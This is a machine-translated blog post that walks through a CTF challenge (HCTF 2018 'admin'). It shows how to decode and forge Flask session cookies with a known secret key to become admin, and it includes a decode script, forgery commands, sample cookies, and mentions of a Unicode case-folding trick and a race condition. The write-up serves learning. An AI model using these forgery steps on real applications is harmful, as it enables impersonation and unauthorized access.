当前位置:网站首页>Flask session forged hctf admin
Flask session forged hctf admin
2022-07-07 13:48:00 【A traveler】
Knowledge point :
flask Of session It's stored on the client side cookie Medium , and flask Only the data is signed . It is well known that , Signature is tamper proof , And cannot be prevented from being read . and flask No encryption operation is provided , So its session All the contents of can be read on the client . Still some session It is stored in the database or in the file of the server .
About only admin To read flag The subject of , We can fake it session To achieve identity forgery ;
Steps are as follows :
There must be a forged code : Download address :https://github.com/noraj/flask-session-cookie-manager
1. First get the website session value ,F12 cookie Get... Inside , And then session To decrypt : Decrypt a lot of scripts online ; What I have here is :
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
The code can be placed from https://github.com/noraj/flask-session-cookie-manager Downloaded session Forge encrypted code files to match cmd Use
Usage method :python session Decrypt .py session value
for example :
>python session Decrypt .py eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs
result :
2. Will decrypt the obtained session To forge , Forgery requires a key , So we need to find its key to forge : Generally, it is forged admin, Just change the user name to admin
Usage method : The flask Forge encryption and decryption , What is commonly used here is encode ,
sentence : python flask_session_cookie_manager3.py encode -s " secret key " -t "session Decryption result ( After changing the user name )"
for example
python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"
3. Will be forged session Re input cookie;
HCTF admin For example :
First of all, we can register an account and password randomly , You can get tips in the source code of the password change interface , The useful source code is in the prompt ;
The source code of this problem needs to be found in the tips given , Refer to others for specific process wp, Anyway, after getting the download path, first look at the route route Although there is nothing in this problem ;
Reference resources :BUUCTF [HCTF 2018]admin 1_wow Xiaohua's blog -CSDN Blog
1.session Copy down : Decrypt session;
python session Decrypt .py .eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAgnACI7ieq-71NQjG8PwFEfNsnQ.YsLkGA.-IhgD3h5Rju-WwMa4YbLJO69j6I
obtain :
{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': '123', 'user_id': '10'}
Will be one of the name value 123 Change it to admin after forge ;
The key here is config.py in ;
2. Direct forgery :
python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"
python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"
result :
.eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAtqWrTzCC67nqXn-DYAzPX_3EbhA.YsLnVA.f91nHdCGekSIwqWqz9T9cba5tkA
3. Re enter the above results cookie Medium session , Refresh ; You can see flag;
This problem passed the code audit , You can also see a function vulnerability :
Unicode cheating
strlower() Leading to deception , Reference resources
HCTFadmin-- About flasksession Forgery and unicode The deception of _Z3eyOnd The blog of -CSDN Blog
That is, through query Unicode Special code for , for instance A Yes. ᴬ , If we register ᴬdmin , The function will put ᴬ It can be interpreted as A; If you change your password or log in again, you will A It can be interpreted as a; So as to achieve the goal ;
There is also conditional competition ; Refer to the link above ;
边栏推荐
- Distributed transaction solution
- 2022-7-6 sigurg is used to receive external data. I don't know why it can't be printed out
- 1. Deep copy 2. Call apply bind 3. For of in differences
- Xshell connection server changes key login to password login
- 1、深拷贝 2、call apply bind 3、for of for in 区别
- Summary of import, export, backup and recovery of mongodb
- Error lnk2019: unresolved external symbol
- Redis只能做缓存?太out了!
- 高等数学---第八章多元函数微分学1
- 118. Yanghui triangle
猜你喜欢
Social responsibility · value co creation, Zhongguancun network security and Information Industry Alliance dialogue, wechat entrepreneur Haitai Fangyuan, chairman Mr. Jiang Haizhou
"New red flag Cup" desktop application creativity competition 2022
Sliding rail stepping motor commissioning (national ocean vehicle competition) (STM32 master control)
MySQL error 28 and solution
566. Reshaping the matrix
Deep understanding of array related problems in C language
2022-7-6 beginner redis (I) download, install and run redis under Linux
xshell连接服务器把密钥登陆改为密码登陆
Thread pool reject policy best practices
数据库系统概论-第一章绪论【概念模型、层次模型和三级模式(外模式、模式、内模式)】
随机推荐
"Song of ice and fire" in the eleventh issue of "open source Roundtable" -- how to balance the natural contradiction between open source and security?
现在网上开户安全么?那么网上开户选哪个证券公司?
记一次 .NET 某新能源系统 线程疯涨 分析
566. 重塑矩阵
Cinnamon taskbar speed
Final review notes of single chip microcomputer principle
xshell连接服务器把密钥登陆改为密码登陆
【堡垒机】云堡垒机和普通堡垒机的区别是什么?
实现IP地址归属地显示功能、号码归属地查询
LED light of single chip microcomputer learning notes
Co create a collaborative ecosystem of software and hardware: the "Joint submission" of graphcore IPU and Baidu PaddlePaddle appeared in mlperf
2022-7-6 beginner redis (I) download, install and run redis under Linux
Split screen bug notes
Ikvm of toolbox Net project new progress
PHP - laravel cache
Move base parameter analysis and experience summary
Server to server (S2S) event (adjust)
QQ medicine, Tencent ticket
交付效率提升52倍,运营效率提升10倍,看《金融云原生技术实践案例汇编》(附下载)
566. Reshaping the matrix